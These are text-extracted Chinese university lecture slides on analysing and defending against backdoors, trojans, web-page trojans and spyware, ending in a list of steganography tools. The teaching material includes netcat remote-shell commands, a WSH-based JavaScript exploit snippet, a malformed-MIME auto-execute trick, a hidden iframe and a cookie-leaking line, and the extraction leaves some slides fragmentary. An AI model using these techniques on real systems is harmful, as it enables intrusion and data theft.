5-back-door

2019/9/14,1,惡意軟件（病毒）的分析與防范 Defence & analysis of malware,計算機學(xué)院 傅建明 F,2019/9/14,2,后門,后門是一個允許攻擊者繞過系統(tǒng)中常規(guī)安全控制機制的程序，他按照攻擊者自己的意圖提供通道。 后門的重點在于為攻擊者提供進入目標計算機的通道。,2019/9/14,3,后門的類型,本地權(quán)限的提升 對系統(tǒng)有訪問權(quán)的攻擊者變換其權(quán)限等級成為管理員，然后攻擊者可以重新設(shè)置該系統(tǒng)或訪問人和存儲在系統(tǒng)中的文件。 單個命令的遠程執(zhí)行 攻擊者可以向目標計算機發(fā)送消息。每次執(zhí)行一個單獨的命令，后門執(zhí)行攻擊者的命令并將輸出返回給攻擊者。 遠程命令行解釋器訪問 正如遠程Shell，這類后門允許攻擊者通過網(wǎng)絡(luò)快速直接地鍵入受害計算機的命令提示。其比“單個命令的遠程執(zhí)行”要強大得多。 遠程控制GUI 攻擊者可以看到目標計算機的GUI，控制鼠標的移動，輸入對鍵盤的操作，這些都通過網(wǎng)絡(luò)實現(xiàn)。,2019/9/14,4,后門的安裝,自己植入（物理接觸或入侵之后） 通過病毒、蠕蟲和惡意移動代碼 欺騙受害者自己安裝 Email 遠程共享 BT下載 ,2019/9/14,5,后門舉例,NetCat：通用的網(wǎng)絡(luò)連接工具 用法一： nc l p 5000 e cmd.exe nc 5000 用法二： nc l p 5000 nc 5000 e cmd.exe cshell.exe,2019/9/14,6,其他Windows下的后門程序,CryptCat Tini 提供通向Tcp端口7777，只有3K。 ,2019/9/14,7,2019/9/14,8,無端口后門-如何喚醒,ICMP后門 不使用TCP/UDP協(xié)議。 使用ICMP協(xié)議進行通信。 難以檢測。 非混合型探測后門攻擊者將觸發(fā)指令發(fā)送到對方計算機。 難以檢測。(Cd00r: syn to port x, syn to port y, syn to port z) 混合型探測后門 只要攻擊者將觸發(fā)指令發(fā)送到對方網(wǎng)絡(luò)中即可觸發(fā)后門。 更加難以檢測。 (syn to port x , syn to port x, syn to port x in different Ips),2019/9/14,9,Bits-glacier,進程管理器中看不到 平時沒有端口，只是在系統(tǒng)中充當臥底的角色 提供正向連接和反向連接兩種功能 僅適用于Windows2000/XP/2003 具體用法和例子可以查看“難以覺察的后門-BITS”一文,2019/9/14,10,GUI(Graphics User Interface)遠程控制,并非所有的GUI遠程控制都是惡意的 VNC(Virtual Network Computing) Windows Terminal Services PCAnywhere Back Orifice 2000 SubSeven,2019/9/14,11,VNC,英國劍橋大學(xué)AT&T實驗室在2002年開發(fā)的輕量型的遠程控制計算機軟件，任何人都可免費取得該軟件。 VNC軟件主要由兩個部分組成： VNC server及VNC viewer。 VNC server 與 VNC viewer 支持多種操作系統(tǒng)，如 windows，Linux，MacOS 及 Unix 系列（Unix，Solaris等），因此可將 VNC server 及 VNC viewer 分別安裝在不同的操作系統(tǒng)中進行控制。 也可以通過一般的網(wǎng)絡(luò)瀏覽器（如 IE 等）來控制被控端（需要 Java 虛擬機的支持）。,2019/9/14,12,VNC程序舉例,2019/9/14,13,后門的啟動,感染普通執(zhí)行文件或系統(tǒng)文件 添加程序到“開始”-“程序”-“啟動”選項 修改系統(tǒng)配置文件win.ini、system.ini、wininit.ini、winstart.bat、autoexec.bat等的相關(guān)啟動選項 通過修改注冊表啟動鍵值 修改文件關(guān)聯(lián)的打開方式 添加計劃任務(wù) 利用自定義文件夾風格 注冊為Internet Explorer的 BHO (Browser Helper Object)組件 具體請參考“Windows的自啟動方式 ”一文。,2019/9/14,14,檢測Windows后門啟動技術(shù),手工檢測 注冊表啟動鍵值 啟動選項 關(guān)聯(lián)方式 計劃任務(wù) 利用工具檢測 Msconfig AutoRuns /Utilities/Autoruns.html 完整性檢測程序（GFI LANguard System Integrity Monitor, Ionx Data Sentinel）,2019/9/14,15,AutoRuns的運行界面,2019/9/14,16,如何防御后門 -普通后門,培養(yǎng)良好的安全意識和習慣。 使用網(wǎng)絡(luò)防火墻封鎖與端口的連接。 僅允許最少數(shù)量的端口通信通過防火墻 天網(wǎng)個人防火墻，瑞星防火墻，江民黑客防火墻，Zone Alarm，Norton Personal Firewall 經(jīng)常利用端口掃描器掃描主機或端口查看工具查找本地端口監(jiān)聽程序。 Nmap，Xscan，NC，F(xiàn)port，TcpView，IceSword,2019/9/14,17,如何防御后門 -無端口后門,查找不尋常的程序 查找不尋常的進程 利用基于網(wǎng)絡(luò)的IDS查找隱蔽的后門命令，如Snort。 檢測本地和網(wǎng)絡(luò)中的混雜模式的網(wǎng)卡 本地檢測嗅探器（Promiscdetect.exe） 遠程檢測嗅探器（Sentinel,AntiSniff）,2019/9/14,18,2. 特洛伊木馬,特洛伊木馬是一個程序，他看起來具有某個有用的或善意的目的，但是實際上掩蓋著一些隱藏的惡意功能。 欺騙用戶或者系統(tǒng)管理員安裝 在計算機上與“正?！钡某绦蛞黄鸹旌线\行，將自己偽裝得看起來屬于該系統(tǒng)。,2019/9/14,19,后門 VS 特洛伊木馬,如果一個程序僅僅提供遠程訪問，那么它只是一個后門。 如果攻擊者將這些后門功能偽裝成某些其他良性程序，那么就涉及到真正的特洛伊木馬。,2019/9/14,20,特洛伊木馬,木馬系統(tǒng)軟件一般由木馬配置程序、控制端程序和木馬程序(服務(wù)器程序)等三部分組成。 木馬程序，也稱服務(wù)器程序，它駐留在受害者的系統(tǒng)中，非法獲取其操作權(quán)限，負責接收控制端指令，并根據(jù)指令或配置發(fā)送數(shù)據(jù)給控制端。 木馬配置程序設(shè)置木馬程序的端口號、觸發(fā)條件、木馬名稱等，使其在服務(wù)端藏得更隱蔽，有時該配置功能被集成在控制端程序菜單內(nèi)，不單獨作為一個程序。 控制端程序控制遠程服務(wù)器，有些程序集成了木馬配置的功能。,2019/9/14,21,2019/9/14,22,2.1名字欺騙,修改文件的文件名以欺騙用戶 與Windows擴展名放在一起 Beauty.jpg .exe 模仿其他文件名 httpd,iexplore,notepad,ups,svchost 不能用“任務(wù)管理器”刪除的進程名 Csrss.exe,services.exe,smss.exe,winlogon.exe,system,system idle process 路徑威脅 如將木馬命名為explorer.exe放在C:下。,2019/9/14,23,對命名陷阱的防御,確定指定進程屬于哪個程序 Fport,icesword,tcpview 使用殺進程工具進行查殺 Pskill,icesword,2019/9/14,24,2.2 文件捆綁,惡意程序與正常程序捆綁 捆綁工具 EXE捆綁機,Wrappers,binders,EXE binders CHM, Flash. 壓縮軟件（winrar） WinRMSetup30.exe 防御 使用反病毒軟件進行檢測，并及時更新病毒庫。,2019/9/14,25,2.3軟件下載,從網(wǎng)上下載的軟件是你真正需要的軟件嗎？ 從網(wǎng)上下載的軟件是否被惡意修改過？ 防御措施 用戶注意 完整性檢測（如MD5,FileChecker） 小心測試新軟件,2019/9/14,26,2.4 軟件本身帶毒,內(nèi)部員工注入惡意代碼 軟件開發(fā)的全球化趨勢 多個部門聯(lián)合開發(fā)軟件，一層層的外包,2019/9/14,27,2.5 Html傳播,網(wǎng)頁病毒的傳播方式 Flash傳播網(wǎng)頁 email傳播網(wǎng)頁 Chm 傳播網(wǎng)頁木馬 Exe2bmp 正常網(wǎng)頁中攜帶,2019/9/14,28,網(wǎng)頁病毒的傳播方式,1-美麗的網(wǎng)頁名稱，以及利用瀏覽者的無知. URL1: /images/mm/plmm001.gif URL2: /images/mm/plmm001.gif,2019/9/14,29,plmm001.gif,2019/9/14,30,Flash傳播網(wǎng)頁,用Flash MX制作： 第一幀，打開動作面板，進入 ActionsBrowerNetWorkGetUrl http:/網(wǎng)頁木馬地址， windows:_self 第二幀， ActionsBrowerNetWorkloadmovie http:/*.swf,2019/9/14,31,email傳播網(wǎng)頁,1. Window.open(“/info.asp?msg=+document.cookie”) 2. ,2019/9/14,32,email傳播網(wǎng)頁,3. 4. 5 ,2019/9/14,33,email傳播網(wǎng)頁,2019/9/14,34,Chm 傳播網(wǎng)頁木馬,x.htm： or Easy CHM or Quick chm 把x.htm和x.exe生成x.chm,2019/9/14,35,exe2bmp,exe2bmp可以將一個.exe可執(zhí)行文件生成同名的.bmp、.asp、.htm三個文件。將這三個文件放到支持ASP的空間里邊，當別人打開.htm網(wǎng)頁文件的時候，先前的.exe木馬將被自動下載到對方的硬盤并運行。 For example x.exe produce:x.bmp; x.asp; x.htm,2019/9/14,36,x.htm, 數(shù)據(jù)裝載中，可能需要10秒至30秒 ,2019/9/14,37,x.asp,1-在cache中尋找1.bmp 2-把bmp還原為exe 3-執(zhí)行exe,2019/9/14,38,正常網(wǎng)頁中攜帶, Window.open Onload, onerror ,2019/9/14,39,網(wǎng)頁病毒、網(wǎng)頁木馬的原理,Javascript.Exception.Exploit ：JS+WSH 錯誤的MIME Multipurpose Internet Mail Extentions，多用途的網(wǎng)際郵件擴充協(xié)議頭. IE5.0到IE6.0 EXE to .BMP + Javascritp.Exception.Exploit iframe 漏洞的利用：父窗口能在子域環(huán)境下運行腳本代碼，包括任意的惡意代碼 通過安全認證的CAB,COX EXE文件的捆綁,2019/9/14,40,Javascript.Exception.Exploit,Function destroy()try a1=document.applets0; a1.setCLSID(“F935DC22-1CF0-11D0-ADB9-00C04FD58A0B“); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID(“0D43FE01-F093-11CF-8940-00A0C9054228“); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID(“F935DC26-1CF0-11D0-ADB9-00C04FD58A0B“); a1.createInstance(); Net = a1.GetObject(); try do something; catch(e) catch(e) function do() setTimeout(“destroy()“, 1000); /設(shè)定運行時間1秒 do() /壞事執(zhí)行函數(shù)指令,2019/9/14,41,錯誤的MIME Multipurpose Internet Mail Extentions,Content-Type: multipart/related; type=“multipart/alternative“; boundary=”=B=“ -=B= Content-Type: multipart/alternative; boundary=”=A=“ -=A= Content-Type: text/html; Content-Transfer-Encoding: quoted-printable -=A=- -=B= Content-Type: audio/x-wav; name=”run.exe“ -可以改為其他腳本文件 Content-Transfer-Encoding: base64 Content-ID: -以下省略AAAAA N+1個-,當申明郵件 的類型為audio/x-wav時，IE存在的一個漏洞會將附件認為是音頻文件自動嘗試打開,2019/9/14,42,iframe,iframe src=run.eml width=0 height=0/iframe,2019/9/14,43,Startup.html, startup document.getElementById(“clientcall“).click() ,2019/9/14,44,HTA的全名為HTML Application, 參見x.asp,2019/9/14,45,各種溢出型漏洞,iframe溢出 Javaprxy.DLL COM對象堆溢出漏洞 /vuls/200507/4055.html,2019/9/14,46,木馬的發(fā)展,加入Rootkit,隱藏文件/端口/服務(wù)/進程等 HTTP隧道 HyDan(把信息隱藏在二進制文件中) ,2019/9/14,47, “) Then% “ & szTempFile, 0, True)% “ method=“POST“ “ ,2019/9/14,48,木馬檢測工具,安天實驗室：木馬防線 ,功能介紹,2019/9/14,49,木馬防線2005+,2019/9/14,50,木馬克星,木馬克星可以查殺8122種國際木馬,1053種密碼偷竊木馬,保證查殺傳奇密碼偷竊木馬,灰鴿子API反殺病毒軟件類木馬,冰河類文件關(guān)聯(lián)木馬,密碼解霸,奇跡射手等游戲密碼郵寄木馬,內(nèi)置木馬防火墻,任何黑客程序試圖發(fā)送密碼郵件,都需要Iparmor 確認,不僅可以查殺木馬,更可以反查黑客密碼。,2019/9/14,51,間諜軟件,他們以主動收集用戶個人信息、相關(guān)機密文件或隱私數(shù)據(jù)為主，搜集到的數(shù)據(jù)會主動傳送到指定服務(wù)器。,2019/9/14,52,間諜軟件發(fā)展之初，多被一些在線廣告商以及Kazaa等音樂交換網(wǎng)站使用，這些公司將一些監(jiān)控程序放在用戶電腦內(nèi)監(jiān)視其網(wǎng)上行為、收集其興趣愛好，或者在空閑時間進行其它操作。 這些公司以讓用戶上網(wǎng)免費賺錢或免費獲得音樂為幌子，吸引了眾多用戶下載，而這些軟件中所帶的間諜程序便悄悄地收集用戶信息，然后根據(jù)這些信息發(fā)送廣告，或者把這些收集的信息轉(zhuǎn)賣給其他廣告公司獲取利益。,2019/9/14,53,間諜軟件的傳播方式,軟件捆綁和嵌套 瀏覽網(wǎng)站（惡意網(wǎng)頁或網(wǎng)頁木馬） 郵件發(fā)送 利用漏洞進行主動傳播和植入（多隱身于蠕蟲之中）。,2019/9/14,54,部分間諜和廣告軟件,CoolWebSearch：可能是最下流也最惡毒的程序之一。它完全劫持了IE瀏覽器，害你什么事都做不成。 PurityScan，一個顯示彈出廣告，聲稱可以發(fā)現(xiàn)并刪除個人電腦上的色情內(nèi)容的程序。 Transponder (vx2)，一個IE“瀏覽器助手”，它能夠監(jiān)控網(wǎng)絡(luò)瀏覽并發(fā)送相關(guān)廣告。 KeenValue是一個廣告程序，它收集個人信息并向計算機用戶發(fā)送廣告。 Perfect Keylogger一個記錄所訪問過的站點、擊鍵的記錄和鼠標的移動的工具。它記錄下用戶的口令和賬戶等信息。,2019/9/14,55,Continue,HotBar(BHO) A better Internet,2019/9/14,56,發(fā)展趨勢,逐漸融合了各種病毒、蠕蟲、木馬、甚至Rootkit的技術(shù)和特點，無處不在，危害特別巨大。 其會變得越來越普遍，越來越復(fù)雜。 功能越來越就有針對性和目的性。 自我隱藏技術(shù)則會越來越先進。 這將給間諜軟件的檢測帶來巨大挑戰(zhàn)。,2019/9/14,57,間諜軟件檢測工具,1.Spybot Search and Destroy(簡稱：SpyBot S&D)：能掃描你的硬盤，然后找出你硬盤里面的廣告和間諜程序，然后把這些會對你的電腦產(chǎn)生危害的程序移除，支持常用的所有瀏覽器。 2.Spy Sweeper：讓你免受間諜軟件的影響，它能在你瀏覽網(wǎng)頁，瀏覽郵件，下載軟件的時候給予你充足的保護，免受間諜軟件的入侵，保護個人的信息。,2019/9/14,58,間諜軟件檢測工具,3.Spyware Doctor：是一個先進的間諜軟件、廣告軟件公用程序，它可以檢查并從你的電腦移走間諜軟件、廣告軟件、木馬程序、鍵盤記錄器和追蹤威脅。 4.SpyRemover：專門為清除悄悄安裝在你的電腦里的間諜程序而設(shè)計的一個計算機網(wǎng)絡(luò)安全工具。它可以幫助你快速的在系統(tǒng)組件中搜索已知的間諜程序的蹤跡，并可以幫助你安全的清除他們。全面保護你的網(wǎng)絡(luò)安全。支持多國語言。,2019/9/14,59,間諜軟件檢測工具,5.微軟：AntiSpyware。 6. McAfee企業(yè)版反間諜軟件。 其可有效偵測及降低遭受間諜程序(spyware)、廣告軟件(adware)、色情撥號程序(dialers)、鍵盤記錄軟件(keyloggers)、cookies文件和遠程控制程序等潛在惡意程序(PUPs)的襲擊。,2019/9/14,60,Question？,2019/9/14,61,Hide information in a file,Blindside (Freeware) - Uses BMP carrier files and includes encryption. BMP Secrets (Freeware) - Uses BMP carrier files and includes encryption. Cameleon (Freeware) - French language tool that uses GIF carrier files and includes encryption. Camera/Shy v (Freeware) - Scans for and delivers decrypted content from the Internet. Camouflage (Freeware) - Can hide information in any digital file type by inserting it after the end of file marker. Information hidden this way will not affect how the carrier looks or behaves, although it will increase file size. Includes password protection. Contraband Hell Edition (Freeware) - Uses BMP carrier files and includes encryption. Courier v1.0a (Freeware) - Uses BMP carrier files. CryptArkan (Shareware) - Uses WAV and BMP carrier files; hidden data can be directly read off an audio CD. Includes encryption. Data Privacy Tools (Freeware) Uses BMP carrier files and includes encryption.,2019/9/14,62,Hide information in a file,Data Stash (Shareware) - Uses BMP and database carrier files and includes password protection. Digital Picture Envelope v1.0 (Freeware) - Uses BMP carrier files. Encrypt Pic (Shareware) - Uses 24-bit BMP carrier files and includes encryption. Gif-it-Up (Freeware) - Uses GIF carrier files and includes encryption. Gifshuffle v2.0 (Freeware) - A command-line tool that uses GIF carrier files and includes encryption. Hermetic Stego (Shareware) - Uses BMP carrier files. The developers claim their stego key makes the payload undetectable. Hide and Seek for Win95 (Shareware) - Uses BMP carrier files and includes encryption and file wiping. Hide4PGP v2.0 (Freeware) - A command-line tool that uses BMP, WAV, and VOC carrier files. Hide In Picture 2.0 (Freeware) - USes BMP carrier files and includes encryption. ImageHide (Freeware) - Uses a variety of image carrier files. In Plain View (Freeware) - Uses BMP carrier files and includes password protection. In The Picture (Shareware) - Uses BMP carrier files and includes encryption.,2019/9/14,63,InfoStego (Freeware)- Uses BMP carrier files; includes encryption. Invisible Secrets v4.0 (Shareware) - Uses JPEG, PNG, BMP, HTML and WAV carrier files. Includes encryption, shredder, password manager and self-decrypting archives. JPegX (Freeware) - Uses JPEG carrier files and includes encryption and password protection. JP Hide and Seek (Freeware) - Uses JPEG carrier files and includes encryption. JSteg Shell v2.0 (Freeware) - Uses JPEG carrier files; includes encryption. MP3Stego (Freeware) - Uses MP3 carrier files. PGPn123 (Freeware) - A tool that facilitates using PGP for Eudora, Agent, or Pegasus Mail and also includes a steganography option. PhotoCrypt 1.1 (Freeware) - Uses BMP carrier files. Sams Big Play